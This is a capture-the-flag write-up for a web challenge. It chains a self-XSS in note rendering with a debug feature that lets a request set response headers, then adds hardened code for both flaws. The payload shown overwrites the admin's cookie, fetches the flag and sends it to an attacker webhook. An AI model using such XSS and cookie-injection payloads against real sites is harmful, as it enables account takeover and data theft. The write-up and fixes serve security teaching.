Tags: xss 

In this challenge the user's note is inserted into the HTML document using `innerHTML`, and no sanitization is done on the backend, so a user can insert arbitrary HTML and get XSS. But this is just a self-XSS. To get XSS on the admin side, we can use the /find API to set a `Set-Cookie` header and make the admin's browser use our own cookie. The final payload is:
```html
<script>
window.open(`http://chall.notepad1.gq:1111/find?startsWith=d&debug=y&Set-Cookie=id=${cookie}%3B%20path=/get`)
// Set cookie to /get so it doesn't delete existing admin cookie
</script>

<script>
window.open("http://chall.notepad1.gq:1111",name=`document.cookie='id=${cookie}; expires=Thu, 01 Jan 1970 00:00:00 UTC;path=/get;';document.cookie=x;fetch('/get').then(response=>response.text()).then(data=>navigator.sendBeacon('${webhook}',data));`)
// Delete the cookie set by you and then retrieve admin's flag
</script>
```

Original writeup (https://blog.bi0s.in/2021/08/16/Web/notepad-inctf21/).
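For the two weaknesses the chain relies on (unsanitized note rendering and a /find debug feature that lets a request set response headers), here is an added example of each beside a hardened version. This is not code from the writeup or the challenge; the function names and the exact shape of the /find debug feature are assumptions.

```javascript
// Added example, not code from the writeup or from the challenge itself.
// It models the two weaknesses the chain above relies on next to a
// hardened version of each. Function names and the exact shape of the
// /find debug feature are assumptions.

// 1. Note rendering. The app put the raw note into innerHTML, so any
//    markup in it becomes live DOM. Escaping the HTML metacharacters
//    (or using textContent in the browser) keeps the note as text.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderNoteUnsafe(note) {
  return `<div class="note">${note}</div>`;            // markup stays live
}

function renderNoteSafe(note) {
  return `<div class="note">${escapeHtml(note)}</div>`; // markup neutralised
}

// 2. The /find debug feature. Modelled as: when debug=y, every query
//    parameter other than the search key is copied into a response
//    header (assumption). Letting the request name its own response
//    headers is what turns the self-XSS into a Set-Cookie on the admin.
function findHeadersUnsafe(query) {
  const headers = { 'content-type': 'application/json' };
  if (query.get('debug') === 'y') {
    for (const [k, v] of query) {
      if (k !== 'startsWith' && k !== 'debug') headers[k.toLowerCase()] = v;
    }
  }
  return headers;
}

// Hardened: response headers are fixed; debug output goes into the JSON
// body, where it cannot set cookies or change how the response is handled.
function findResponseSafe(query) {
  const body = { startsWith: query.get('startsWith') };
  if (query.get('debug') === 'y') body.debug = Object.fromEntries(query);
  return { headers: { 'content-type': 'application/json' }, body };
}
```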